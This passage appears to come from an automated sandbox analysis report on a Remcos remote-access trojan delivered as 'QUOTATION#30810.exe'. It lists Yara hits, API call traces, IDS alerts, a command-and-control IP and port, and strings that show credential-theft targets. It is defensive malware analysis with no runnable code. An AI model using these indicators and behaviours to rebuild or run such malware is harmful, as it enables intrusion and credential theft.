                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4360, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,26_2_00433837
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,45_2_00433837
                        Source: svchost.exe, 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_3b33a0c1-3

                        Exploits

                        barindex
                        Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000021.00000003.1770928480.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000003.1770848664.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000003.1770876326.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000002.1926881023.0000017F2EDDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.1814204610.00000172222A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000003.1770951803.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000003.1770441759.000002453D690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000003.1770666779.000002453D690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000003.1770897911.000002453D6A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1595193809.000001FC8003B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000003.1770638691.000002453D690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1861743412.000001E1DDBDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000002.1955305299.000001D080302000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000002.1814204610.0000017222011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1926724115.00000227078A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002A.00000002.1926881023.0000017F2EE1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: QUOTATION#30810.exe PID: 4508, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5864, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5572, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: cmstp.exe PID: 2824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6908, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6020, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Windows\Temp\macatsxh.inf, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Temp\54bmrp0l.inf, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Temp\xrlumlnf.inf, type: DROPPED

                        Privilege Escalation

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_004074FD _wcslen,CoGetObject,26_2_004074FD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_004074FD _wcslen,CoGetObject,45_2_004074FD
                        Source: QUOTATION#30810.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: svchost.PDBy# source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: mscorlib.pdbp^ source: WER5A3A.tmp.dmp.48.dr
                        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdbRSDS source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb. source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb(System.Object, System.Object[], System.Signature, Boolean) source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbOneDrive=C:\Users\user\OneDriveh source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbn source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdber source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbme.Int source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: mscorlib.pdbh source: WER1988.tmp.dmp.29.dr
                        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1979891281.000001D0E86AE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: pC:\Users\user\AppData\Roaming\svchost.PDB0 source: svchost.exe, 00000028.00000002.1950250022.000000651B8F3000.00000004.00000010.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000028.00000002.1979891281.000001D0E86AE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb:n source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: st.PDB source: svchost.exe, 00000028.00000002.1980448625.000001D0E86E3000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdb source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER1DAE.tmp.dmp.25.dr, WER5A3A.tmp.dmp.48.dr, WER1988.tmp.dmp.29.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_100010F1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 20_2_10006580 FindFirstFileExA,20_2_10006580
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,26_2_00409253
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,26_2_0041C291
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,26_2_0040C34D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,26_2_00409665
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0044E879 FindFirstFileExA,26_2_0044E879
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,26_2_0040880C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040783C FindFirstFileW,FindNextFileW,26_2_0040783C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,26_2_00419AF5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,26_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,26_2_0040BD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0040AE51 FindFirstFileW,FindNextFileW,32_2_0040AE51
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,37_2_00407EF8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,39_2_00407898
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,45_2_00409253
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,45_2_0041C291
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,45_2_0040C34D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,45_2_00409665
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0044E879 FindFirstFileExA,45_2_0044E879
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,45_2_0040880C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0040783C FindFirstFileW,FindNextFileW,45_2_0040783C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,45_2_00419AF5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,45_2_0040BB30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,45_2_0040BD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,26_2_00407C97

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.8:49708 -> 172.245.208.13:4445
                        Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 172.245.208.13:4445 -> 192.168.2.8:49708
                        Source: Malware configuration extractorURLs: 172.245.208.13
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 172.245.208.13 172.245.208.13
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.208.13
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,26_2_0041B380
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                        Source: vbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                        Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                        Source: vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                        Source: vbc.exe, 00000020.00000002.1857899131.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                        Source: svchost.exe, 0000001F.00000003.1804618282.0000013DBB12E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1804618282.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbA
                        Source: svchost.exe, 0000001F.00000002.3658907381.0000013DBB6AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657976153.0000013DBA892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3658481481.0000013DBB600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                        Source: bhv32CD.tmp.32.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: bhv32CD.tmp.32.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                        Source: svchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: bhv32CD.tmp.32.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: bhv32CD.tmp.32.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: bhv32CD.tmp.32.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: svchost.exe, 0000001F.00000003.1815397781.0000013DBB12B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-
                        Source: svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823387561.0000013DBB17F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd.
                        Source: svchost.exe, 0000001F.00000003.3656628429.0000013DBB105000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd84
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdA
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdcred
                        Source: svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdns:sam
                        Source: svchost.exe, 0000001F.00000003.1797644727.0000013DBA872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd.
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0n
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB175000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB174000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                        Source: svchost.exe, 0000001F.00000003.3656628429.0000013DBB105000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdQ
                        Source: svchost.exe, 0000001F.00000003.1792301764.0000013DBB152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsddre
                        Source: svchost.exe, 0000001F.00000003.3657144064.0000013DBB179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1823308059.0000013DBB179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdody
